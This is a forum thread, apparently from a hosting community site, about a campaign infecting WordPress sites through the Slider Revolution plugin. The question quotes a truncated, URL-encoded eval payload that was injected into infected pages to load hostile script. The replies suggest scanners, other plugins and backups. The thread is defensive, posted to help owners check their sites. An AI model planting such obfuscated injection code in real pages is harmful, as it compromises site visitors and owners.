WordPress Malware...check your sites!

Question

Looks like another WordPress exploit.:Some 100,000 or more WordPress sites infected by mysterious malware Just checked all my sites and they look good. I did not bother using the suggested site scanner, but rather looked at the source code of all pages, since this: “The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that includes the following:” eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B")); From what I have read, this was specific to sites using Slider Revolution, a premium WordPress plugin/

alexdo · Answer

Hello there,

The revolution slider is known for having security vulnerabilities and I’ll recommend using another gallery plugin for your WordPress site.

It is essential to secure your droplet, however running malware software is not definitely a must, but it is still a good thing to do.

I’ll highly recommend checking our tutorial An Introduction to Securing your Linux VPS

https://www.digitalocean.com/community/tutorials/an-introduction-to-securing-your-linux-vps

I can recommend using software like Linux Malware Detect which is a malware scanner for Linux.

Hope that this helps!

hunky · Answer

TO check, use websites like https://www.virustotal.com/ for URL scanner !!

nicklas473292 · Answer

Thank you so much for posting this, my entire site got it’s poo pushed in.

Thank god I used a backup plugin.

The attack blocked me out of my admin panel, corrupted the entire website - I’m still learning on Wordpress stuff, so I would’ve lost 5 months without a backup plugin.

Thanks for posting this, I’ve disabled the slide plugin right away.

Question

WordPress Malware...check your sites!